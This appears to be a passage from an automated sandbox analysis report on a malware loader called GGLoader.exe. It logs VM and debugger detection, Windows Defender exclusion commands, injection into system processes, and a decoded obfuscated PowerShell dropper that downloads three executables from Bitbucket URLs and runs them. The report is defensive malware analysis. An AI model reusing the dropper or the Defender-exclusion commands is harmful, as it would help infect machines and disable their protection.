entget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Source: svchost.exe, 00000035.00000000.2297078138.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: GGLoader.exe, 00000000.00000002.1714729669.00000000034D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware@E
Source: svchost.exe, 00000035.00000000.2297078138.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: lsass.exe, 0000002C.00000002.2961113290.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223603284.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2956835957.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2231046863.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2273754697.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2954077537.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2274757893.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2954277150.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2962965792.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2277933173.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000035.00000000.2294844228.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 0000002D.00000002.2959155286.000002A66066B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000031.00000002.2952925182.000002295CE00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\GGLoader.exe Code function: 0_2_00007FFD9B885D4D CheckRemoteDebuggerPresent, 0_2_00007FFD9B885D4D
Source: C:\Users\user\Desktop\GGLoader.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 6_2_00793F90
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007BB2BB mov eax, dword ptr fs:[00000030h] 6_2_007BB2BB
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007AFF51 mov ecx, dword ptr fs:[00000030h] 6_2_007AFF51
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0B2BB mov eax, dword ptr fs:[00000030h] 35_2_00C0B2BB
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BFFF51 mov ecx, dword ptr fs:[00000030h] 35_2_00BFFF51
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007BDA5F GetProcessHeap, 6_2_007BDA5F
Source: C:\Users\user\Desktop\GGLoader.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A5B6A
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A9BF3
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5CCC SetUnhandledExceptionFilter, 6_2_007A5CCC
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_007A5DD5
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF9BF3
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF5B6A
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5CCC SetUnhandledExceptionFilter, 35_2_00BF5CCC
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_00BF5DD5
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E597E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E597E70
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E59B50C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1B7E70
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1BB50C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000002131118B50C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000021311187E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_0000021311187E70
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC64B50C
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_7520.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7520, type: MEMORYSTR
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 42_2_0000000140001DB4
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AED92908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA22908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13FF2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ABF92908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D652908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1162908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6A82908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13CB2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B1812908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5FC2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E562908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C182908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14E2908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1512908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC572908
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E7AB2908
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#>
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe NtQuerySystemInformation: Direct from: 0x7FF7D3B994FE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000 value starts with: 4D5A
